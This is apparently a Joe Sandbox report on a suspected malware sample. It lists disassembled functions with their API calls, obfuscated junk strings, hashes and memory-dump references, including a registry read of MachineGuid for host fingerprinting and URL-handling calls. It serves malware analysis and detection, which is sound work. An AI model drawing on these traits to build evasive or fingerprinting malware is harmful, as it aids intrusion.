Instruction Fuzzy Hash: 44516330D0125CDEDB10CFA8DE51BEEBBB9AB05300F18825AE405BB2C1DB799B45EB51

Function 00F02EA0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 136COMMON

Download Yara Rule

Strings

\, xrefs: 00F02EFC
,, xrefs: 00F02F21
d, xrefs: 00F02FA2
rvqfbzqkzchslsowjgwbgixyqxqahpgvicmrxyzufifpctjqvucgyyeawwbhskxnegbgufnoibeaiqpmwd, xrefs: 00F02ED2, 00F02F3D, 00F02F5A, 00F02FBE, 00F02FDB
A, xrefs: 00F03043

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID:
String ID: ,$A$\$d$rvqfbzqkzchslsowjgwbgixyqxqahpgvicmrxyzufifpctjqvucgyyeawwbhskxnegbgufnoibeaiqpmwd
API String ID: 0-2569941080
Opcode ID: 244611f0d31581032ab6dce4304c15d5fc88b6f83c0c8c5456a5c8ea6affe573
Instruction ID: 6aec78f7055120eceed0cfa418fc7462bf0fcac8e5c526e2d429ebc5f266cb43
Opcode Fuzzy Hash: 244611f0d31581032ab6dce4304c15d5fc88b6f83c0c8c5456a5c8ea6affe573
Instruction Fuzzy Hash: 1051B871E01259DBEB10CFA8DA85BEEBBB5BF04344F108159E005BB2C1DB789A45FB60

Function 00F01FE0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 132COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 00F02065
task.LIBCPMTD ref: 00F02074
task.LIBCPMTD ref: 00F020E6
task.LIBCPMTD ref: 00F020F5

Strings

lkyntrsqz, xrefs: 00F0200E, 00F02022, 00F0203F, 00F0209D, 00F020BA, 00F0211E, 00F0213B
8, xrefs: 00F02102
D, xrefs: 00F02081

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: task
String ID: 8$D$lkyntrsqz
API String ID: 1384045349-148982923
Opcode ID: df2eea6af198d2119b7c73297aa0f0000d5dca87d3ea432755686a2eea8a2cb5
Instruction ID: 6d0189adcd784d16a6b655a92dc83cc70566205f974f3412b2d2309a62d94d8c
Opcode Fuzzy Hash: df2eea6af198d2119b7c73297aa0f0000d5dca87d3ea432755686a2eea8a2cb5
Instruction Fuzzy Hash: F9512770D04268EADB54EBA8DC85BEDBBB5BF04300F1081A9E505B72C1DB785A49FB61

Function 00F030A0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 69COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 00F03163
task.LIBCPMTD ref: 00F0316F
task.LIBCPMTD ref: 00F0317B
task.LIBCPMTD ref: 00F03187
task.LIBCPMTD ref: 00F03196

Strings

A, xrefs: 00F03137
ujyqmneftulvwfljvcmwetqvlmaymtityduoubcyyomgaapgyenshgo, xrefs: 00F030E3
ocibpbo, xrefs: 00F030F4
qpbylxwxflfebdrntvmeuqlydjolllbohiwrnuuzrok, xrefs: 00F030D2

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: task
String ID: A$ocibpbo$qpbylxwxflfebdrntvmeuqlydjolllbohiwrnuuzrok$ujyqmneftulvwfljvcmwetqvlmaymtityduoubcyyomgaapgyenshgo
API String ID: 1384045349-345111150
Opcode ID: 183cae2572a1c2d8589087f40000aa919dad13cb3c56ceb7429cdefd33608c8f
Instruction ID: de651cdf5316fd6d860a80292834650b55b75a94fe784ca36342d09607a4251f
Opcode Fuzzy Hash: 183cae2572a1c2d8589087f40000aa919dad13cb3c56ceb7429cdefd33608c8f
Instruction Fuzzy Hash: F8316630C1468CCADB05DFA4C9157EDBBB8FB09740F508259E411BB2C1EBB85A45EB40

Function 005E6B20 Relevance: 15.1, APIs: 12, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(005EA088), ref: 005E6B31
StrCmpNIA.SHLWAPI(?,?,00000000), ref: 005E6B6A
LeaveCriticalSection.KERNEL32(005EA088,00000000), ref: 005E6B86
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005E6BE0
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005E6BE7
LeaveCriticalSection.KERNEL32(005EA088,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005E6BFD
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005E6C17
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005E6C1E
LeaveCriticalSection.KERNEL32(005EA088,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005E6C2F
GetProcessHeap.KERNEL32(00000008,?,?), ref: 005E6C3B
HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005E6C42
LeaveCriticalSection.KERNEL32(005EA088), ref: 005E6C53

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: Heap$CriticalSection$Leave$Process$Alloc$EnterFree
String ID:
API String ID: 2132424838-0
Opcode ID: 885d08d916353b368b5912dd7a6a304a1f806ea93335dfc457bbfbcd04633eab
Instruction ID: 91142c0cc3b5669cca93556bd4d4366f54d0fb4cddcb888d4939832d26443a1d
Opcode Fuzzy Hash: 885d08d916353b368b5912dd7a6a304a1f806ea93335dfc457bbfbcd04633eab
Instruction Fuzzy Hash: 2431D4716012C19FE71C9F76AC8CB6B3F65FBB43A2F141068E1D1CA1A0D730A808DB11

Function 005E71A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 120registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 005E71CA
RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 005E71E6
GetProcessHeap.KERNEL32(00000008,?), ref: 005E71F9
HeapAlloc.KERNEL32(00000000), ref: 005E7200
RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 005E721D
RegCloseKey.ADVAPI32(80000002), ref: 005E7229

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 005E71C0
MachineGuid, xrefs: 005E71DE, 005E7215

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: HeapQueryValue$AllocCloseOpenProcess
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2639912721-1211650757
Opcode ID: eb4d00010110b4d65f11fc8ad75258f93102fea1ee44f46c9ff18d8f69ab3eea
Instruction ID: dae25b91e3953ea70fac80e7c9114f5cc0cd7b6e63b2c8b8341b9822067e73c0
Opcode Fuzzy Hash: eb4d00010110b4d65f11fc8ad75258f93102fea1ee44f46c9ff18d8f69ab3eea
Instruction Fuzzy Hash: 2D31D439E08699AAEB398FA6CC84BAFBFB5FF58700F644455EAC1D7250E3709940C650

Function 00F0602B Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00F0614A
___TypeMatch.LIBVCRUNTIME ref: 00F06258
_UnwindNestedFrames.LIBCMT ref: 00F063AA
CallUnexpected.LIBVCRUNTIME ref: 00F063C5

Strings

csm, xrefs: 00F060D5
csm, xrefs: 00F06068
csm, xrefs: 00F06181

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: a8a39477f0fe7d3f2be0489dc2a8cb7eafecd218b0adaf13a9d9af001fcdd355
Instruction ID: cf6de946b04e0f13b63f04b9399adbf5c2058742fe3e5e11173a183ceea89d88
Opcode Fuzzy Hash: a8a39477f0fe7d3f2be0489dc2a8cb7eafecd218b0adaf13a9d9af001fcdd355
Instruction Fuzzy Hash: C8B17871C00219EFDF24DFA4D9819AEBBB5BF14720B14805AE800AB292D774DA61FF91

Function 00F02950 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 74COMMON

Download Yara Rule

Strings

G, xrefs: 00F02A10
beaemujvpajrvbaezouuzkuenvffkjpbnnirudwjvuzqydvezlarzhdsfxwuhzojaavxqsfrojtvvhymywenjfz, xrefs: 00F029A3
uddhomtrruwqszocsssabgvinoqawnbjjydctdjlooafgswzslbhgzmrkvbotxaekjvxqqzflyruasphbtqjdnqeddrfqqgnzi, xrefs: 00F0297B
asvicjtdhmzqotxvozjkovueuspcnlsoajeseuzmqsvumshplyhddsgzgnwdujkffassuagpxdjjtqpfeyuvjhzapj, xrefs: 00F029B4

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID:
String ID: G$asvicjtdhmzqotxvozjkovueuspcnlsoajeseuzmqsvumshplyhddsgzgnwdujkffassuagpxdjjtqpfeyuvjhzapj$beaemujvpajrvbaezouuzkuenvffkjpbnnirudwjvuzqydvezlarzhdsfxwuhzojaavxqsfrojtvvhymywenjfz$uddhomtrruwqszocsssabgvinoqawnbjjydctdjlooafgswzslbhgzmrkvbotxaekjvxqqzflyruasphbtqjdnqeddrfqqgnzi
API String ID: 0-2951736196
Opcode ID: 6a88c0c1e5c157cc09a0f583872a69d754f1f5902ba49bfa5c7e512f17d93c03
Instruction ID: 4aca68ec5bd9afea0fd8b9705da8ea381e580d178bd0b93110c659399a572a58
Opcode Fuzzy Hash: 6a88c0c1e5c157cc09a0f583872a69d754f1f5902ba49bfa5c7e512f17d93c03
Instruction Fuzzy Hash: 25315670D1439CCAEB14DFA8C9587EEBBB5BB04314F104219D405BB2C1DBB85A85FB51

Function 005E6670 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 167memorynetworkCOMMON

Download Yara Rule

APIs

InternetCrackUrlW.WININET(005EA10C,00000000,00000000,0000003C), ref: 005E66D5
GetProcessHeap.KERNEL32(00000008,00000001,005EA10C), ref: 005E66F7
HeapAlloc.KERNEL32(00000000), ref: 005E66FA
GetProcessHeap.KERNEL32(00000008,00000000,00000000), ref: 005E6769
HeapAlloc.KERNEL32(00000000), ref: 005E676C

Strings

<, xrefs: 005E668B

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcess$CrackInternet
String ID: <
API String ID: 2637570027-4251816714
Opcode ID: 733cff1bffb0e7d240d2ce5c8700343f00775d3c043e8d86198d49a71f1244f4
Instruction ID: b487ac37f63f964c41d7cfcd996ed2803dc27f33dd48fd9ac3618a676a5d7b0a
Opcode Fuzzy Hash: 733cff1bffb0e7d240d2ce5c8700343f00775d3c043e8d86198d49a71f1244f4
Instruction Fuzzy Hash: FF51F374A003868FDB28CF69D484BAEBBF0FF65388F2440ACD495DB652D7719906CB50

Function 00F059A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00F059D7
___except_validate_context_record.LIBVCRUNTIME ref: 00F059DF
_ValidateLocalCookies.LIBCMT ref: 00F05A68
__IsNonwritableInCurrentImage.LIBCMT ref: 00F05A93
_ValidateLocalCookies.LIBCMT ref: 00F05AE8

Strings

csm, xrefs: 00F05A7D

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: c5829a6dad4458682265749fb52f0171146274fcbac94ba3442978b2ca61932a
Instruction ID: 35e9f064b5b9486c9217063edd4669ec709064178fc4341d3fb22555ea3fb72a
Opcode Fuzzy Hash: c5829a6dad4458682265749fb52f0171146274fcbac94ba3442978b2ca61932a
Instruction Fuzzy Hash: 7741A034F00608EBCF10DF68CC84A9F7BA1AF49724F148155E814AB2D2D7799A55FF90

Function 00F02810 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

V, xrefs: 00F02886
E, xrefs: 00F028CB
-, xrefs: 00F028A6
vdxqujrbgdewzmu, xrefs: 00F02907

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID:
String ID: -$E$V$vdxqujrbgdewzmu
API String ID: 0-431869934
Opcode ID: dc851f5e567b3a33d37eb4acd94cac88c2f95f9f2be99df64ad8f880e14f3599
Instruction ID: 76aef42773911855bdc285cd529af2590ae4100355b07400f22eebc208c0330b
Opcode Fuzzy Hash: dc851f5e567b3a33d37eb4acd94cac88c2f95f9f2be99df64ad8f880e14f3599
Instruction Fuzzy Hash: 1C313B75D0524DCBEB44CF98C9487EEBBB1FB45318F20811AD411BA2C0DB799A44FBA1

Function 00F02B80 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 00F02C4A
task.LIBCPMTD ref: 00F02C59
task.LIBCPMTD ref: 00F02C96
task.LIBCPMTD ref: 00F02CA5

Strings

pavbdksuyfvhipdpzirreavpchekomwlwyogckkwulgrtrdkljtoqeysjlgc, xrefs: 00F02BC9, 00F02C01, 00F02C1E
zjhviby, xrefs: 00F02BB5

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: task
String ID: pavbdksuyfvhipdpzirreavpchekomwlwyogckkwulgrtrdkljtoqeysjlgc$zjhviby
API String ID: 1384045349-3793283277
Opcode ID: 8fcc80a978c3ebe0419313ae79983239fc34f48cd6abd30ee994353d132edb4d
Instruction ID: 4fb7dd7f0d3f8bc617193f0485e7bd074bcbec1166c05f6d2d86ac759ae83afc
Opcode Fuzzy Hash: 8fcc80a978c3ebe0419313ae79983239fc34f48cd6abd30ee994353d132edb4d
Instruction Fuzzy Hash: 82315331C0065CDADB10DFA4C955BEEBBB4BF0A340F208259E415BB2C1EB785A4AEB51

Function 00F0B35A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00F011AD,?,32DDA911,?,00F0B469,?,00F093E8,00000000,00F011AD), ref: 00F0B41B

Strings

api-ms-, xrefs: 00F0B3B1
ext-ms-, xrefs: 00F0B3C5

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: cf6ba42e29287d5ff740676b2dd2b9f8141a1c7ac55b4e275f471f80d4a9efdb
Instruction ID: a244c6945e6bd8bb28f961480761e5666394518d526b7a2d903c22f6ea0a1153
Opcode Fuzzy Hash: cf6ba42e29287d5ff740676b2dd2b9f8141a1c7ac55b4e275f471f80d4a9efdb
Instruction Fuzzy Hash: 10212736E01214ABCB219F24DC81BAE7798DF517B4F224220E911B72D1D730EE01FAE1

Function 00F02AA0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 00F02B44
task.LIBCPMTD ref: 00F02B50
task.LIBCPMTD ref: 00F02B5F

Strings

tfxgtsblbgudmdxba, xrefs: 00F02AE6
cfuvejvbssmjfbdrlhfalepckdilijlgikpyyremfooquqvrexiomahhenabmxgcowziwayllhzkiiwgxcakznqonwploswdmza, xrefs: 00F02AF7
avktuarnjkmnwctvchpilxmppiyzlfbuibfddhbmaxkrelldrlrqufnncxikjppawdahzkofotemazydtnc, xrefs: 00F02AD2

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: task
String ID: avktuarnjkmnwctvchpilxmppiyzlfbuibfddhbmaxkrelldrlrqufnncxikjppawdahzkofotemazydtnc$cfuvejvbssmjfbdrlhfalepckdilijlgikpyyremfooquqvrexiomahhenabmxgcowziwayllhzkiiwgxcakznqonwploswdmza$tfxgtsblbgudmdxba
API String ID: 1384045349-1665046790
Opcode ID: 63a7d59d8e779ec3873f420c9f21ca80988decdfbf6bf86b6e77188b29bf6bc6
Instruction ID: 46ecb3977abc84efc1a2230ec05a898af33e91d344cd04d3d5bb568600eeb159
Opcode Fuzzy Hash: 63a7d59d8e779ec3873f420c9f21ca80988decdfbf6bf86b6e77188b29bf6bc6
Instruction Fuzzy Hash: 2821547090025CCADB00DFA4CD59BEDBBB4FB04714F504229E416BB2C1DBB8AA49EB51

Function 005E8514 Relevance: 9.1, APIs: 6, Instructions: 81sleepstringthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 005E81A6
lstrcmpA.KERNEL32(00000000,INIT), ref: 005E81B3
StrToIntA.SHLWAPI(00000000), ref: 005E8276
GetTickCount64.KERNEL32 ref: 005E867B

Part of subcall function 005E5760: GetProcessHeap.KERNEL32(00000008,00000001,005E823E,00000001,00000000), ref: 005E5763
Part of subcall function 005E5760: HeapAlloc.KERNEL32(00000000), ref: 005E576A

StrToIntA.SHLWAPI(00000000), ref: 005E8574
StrToIntA.SHLWAPI(?), ref: 005E857D
CreateThread.KERNEL32(00000000,00000000,Function_00007570,00000000,00000000,00000000), ref: 005E8591
CloseHandle.KERNEL32(00000000), ref: 005E859C

Part of subcall function 005E5780: GetProcessHeap.KERNEL32(00000000,00000000,005E86C5), ref: 005E5787
Part of subcall function 005E5780: HeapFree.KERNEL32(00000000), ref: 005E578E

Sleep.KERNEL32(00000000), ref: 005E86D6

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: Heap$ProcessSleep$AllocCloseCount64CreateFreeHandleThreadTicklstrcmp
String ID:
API String ID: 1253608127-0
Opcode ID: 162cf6da778296b5c204e5cabcc2268b9ff05092a9193b37e13777f50f799773
Instruction ID: bd69290817964e244bcf65bcd59f07df62bf66058646a63fe3c74d1909be9b54
Opcode Fuzzy Hash: 162cf6da778296b5c204e5cabcc2268b9ff05092a9193b37e13777f50f799773
Instruction Fuzzy Hash: F321F932E007969BDB2CABB2CC99A7F7E75BF94340F10045AE495A7290EF34ED048791

Function 00F05CF4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00F05CEB,00F058E2,00F05066), ref: 00F05D02
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F05D10
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F05D29
SetLastError.KERNEL32(00000000,00F05CEB,00F058E2,00F05066), ref: 00F05D7B

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 4b050555a8b9618684367dbc77771314edd5b81eb6274e7b7a93b3583b9e825f
Instruction ID: a99ef7d38ae5804fb0ea5c0ac67898eab4a69633ba005961e89074fc8e3aee45
Opcode Fuzzy Hash: 4b050555a8b9618684367dbc77771314edd5b81eb6274e7b7a93b3583b9e825f
Instruction Fuzzy Hash: 2701D83250EB1DAEFB242674BC8D79B3A54EB09B75721422BF520850F1FF958C117544

Function 00F02D00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 00F02D8B
task.LIBCPMTD ref: 00F02D97
task.LIBCPMTD ref: 00F02DA3
task.LIBCPMTD ref: 00F02DB2

Strings

ifzhjtykldxivkkvpudrnyrhjbvqsnofbmfktkcithkjgeaacrzxhwzalussflvvedy, xrefs: 00F02D32

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: task
String ID: ifzhjtykldxivkkvpudrnyrhjbvqsnofbmfktkcithkjgeaacrzxhwzalussflvvedy
API String ID: 1384045349-2373637132
Opcode ID: 4ee52d91b54dcbbcf89bafea622fba5c93fd30359f01f1519fe6387b68196fd0
Instruction ID: b1ebebf5ddf25b1c9590cd206cac63e59269c318950ebf45afd864d2b267291f
Opcode Fuzzy Hash: 4ee52d91b54dcbbcf89bafea622fba5c93fd30359f01f1519fe6387b68196fd0
Instruction Fuzzy Hash: EA219A70C04A8CDEDB01DFA8C9147DEBBB4EF1A310F408259E411BB2C1DBB95A45EB91

Function 00F02DE0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 50COMMON

Download Yara Rule

Strings

=, xrefs: 00F02E30
8, xrefs: 00F02E0B
-, xrefs: 00F02E50

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID:
String ID: -$8$=
